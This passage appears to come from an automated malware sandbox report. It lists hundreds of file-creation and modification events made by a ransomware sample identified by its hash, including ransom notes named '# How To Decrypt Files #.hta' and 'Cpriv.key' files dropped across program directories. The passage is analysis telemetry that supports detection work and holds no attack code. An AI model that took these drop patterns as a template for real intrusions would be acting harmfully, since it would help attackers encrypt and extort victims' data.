for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02263_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\WATER.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_bezel.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Defender\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00828_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL077.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01468_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBRPH2.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\MedianLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Skins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OCRHC.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBSBR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\PROOF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_on.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Skins\Revert.wmz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0235319.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1046\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-output2.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01750_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME01.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGDOTS.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULQOT98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us\AccessMUISet.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\SoftBlue.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01015_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\Registration\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\digest.s de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21527_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10264_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216600.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107254.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\AFTRNOON.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKACCL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00260_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105502.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\LEVEL.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALSO98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Temp\GUM3C25.tmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Excel.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21427_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21342_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00132_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\CONVERT\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00837_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107512.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183290.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSOUC_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipskor.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Sales Pipeline.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplateRTL.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGDOTS.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OnLineIdle.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\APPLAUSE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPUNCT.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Oriel.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Mail\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_choosefont.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00445_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-dayi.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EXPEDITN\THMBNAIL.PNG 